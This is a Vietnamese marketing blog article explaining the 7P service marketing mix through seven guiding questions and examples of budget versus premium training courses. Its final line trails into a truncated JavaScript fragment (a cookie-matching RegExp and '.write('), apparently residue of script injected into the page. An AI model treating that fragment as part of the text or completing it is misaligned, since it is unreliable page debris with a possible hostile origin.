Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Công thức marketing online cho dịch vụ

Công thức marketing online cho dịch vụ

Chấm 7p cho online marketing dịch vụ

Marketing online và marketing dịch vụ nói chung có nhiều điểm tương đồng. Trong đó, có thể kể đến chính là cấc yếu tố thuộc về 7P.

Một bảng câu hỏi sẽ là hợp lý cho người nào đang làm dịch vụ. Bảng câu hỏi đó đơn giản là trả lời 7 câu hỏi của 7P. Nhưng do chưa dám khẳng định kinh nghiệm của mình đủ để bao sân offline nên các ý trong này phục vụ marketing online là chính.

7p_marketing-online- Cách mix và hiệu quả.

7p_marketing-online- Cách mix và hiệu quả.

Bảy câu hỏi tương ứng 7p:

Sản phẩm/dịch vụ là gì, package như thế nào?
Giá cả theo đó ra sao? Thuộc loại đắt hay rẻ? (So với ai?)
Nhóm khách hàng nào là mục tiêu lớn nhất?
Làm sao để khách hàng biết đến, mua hàng, hoặc được kích thích mua hàng?
Quy trình thực hiện dịch vụ như thế nào?
Ai phục vụ khách hàng? Họ có bằng cấp chứng chỉ hoặc mức độ uy tín như thế nào?
Bằng chứng (cầm được, sờ được) nào chứng tỏ bạn thật sự tốt?

Trả lời hết, sau đó xem lại trên website của bạn đã SHOW ra được bao nhiêu những thứ này và CÁCH mà nó được viết ra hoặc mô phỏng bằng media như thế nào? Lúc đó, bạn sẽ tự hiểu rằng mình cần làm gì tiếp theo.

Hoàn thiện từng P và mix

Thực tế, việc hoàn thiện từng P không phải điều đơn giản. Thông thường, mọi người kinh doanh hay tập trung hoàn thiện Sản phẩm/dịch vụ và quy trình phục vụ trước, sau đó điều chỉnh giá, nhưng thực tế, việc “trộn” 7P như thế nào cho hài hoà thì là cả một nghệ thuật phức tạp.

Có thể bạn sẽ không cần bắt đầu với sản phẩm hoặc dịch vụ mà từ giá hoặc thậm chí từ một bằng chứng (Physical Evidence). Nhưng sau đó, yếu tố quyết định mua hàng lại là khả năng mix của bạn. Nghiên cứu một ví dụ sau để hiểu hơn vấn đề:

Sản phẩm của bạn là đào tạo. Bạn đã có khoá học lớp học rồi, dự định bán khoá học cho người ít tiền. Vậy là đủ để thực hiện các P tiếp theo rồi: Khách hàng có số lượng lớn, tập trung ở nhiều nơi. Cách mà bạn promotion là qua các kênh giá rẻ, đại chà, kích thích mua hàng bằng giá thấp. Phục vụ đơn giản, cho số lượng lớn, chỉ cần người đào tạo có kinh nghiệm, thân thiện là được. Còn bằng chứng thì chỉ cần đạt tối thiểu về chất lượng và chương trình được cấp phép.

Nhưng cũng đào tạo, tập trung vào nhóm khách hàng nhiều tiền. Số lượng ít, kênh quảng cáo giá cao, đắt tiền, tập trung chỉ một số nơi, promotion và kích thích mua hàng tập trung vào việc nâng cao giá trị bản thân của người mua hàng (sĩ diện của khách hàng). Người dạy phải uy tín, có địa vị cao hơn khách hàng, chương trình không chỉ được cấp phép mà còn là chương trình có bản quyền, uy tín hoặc nhượng quyền từ chương trình uy tín. Quy trình phục vụ phải hoàn hảo và xuất sắc.

Thông thường, bắt đầu từ sản phẩm sẽ dễ dàng cho những người mới, nhưng khi đã quen với việc marketing rồi, bắt đầu từ bất cứ P nào bạn muốn đều được. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘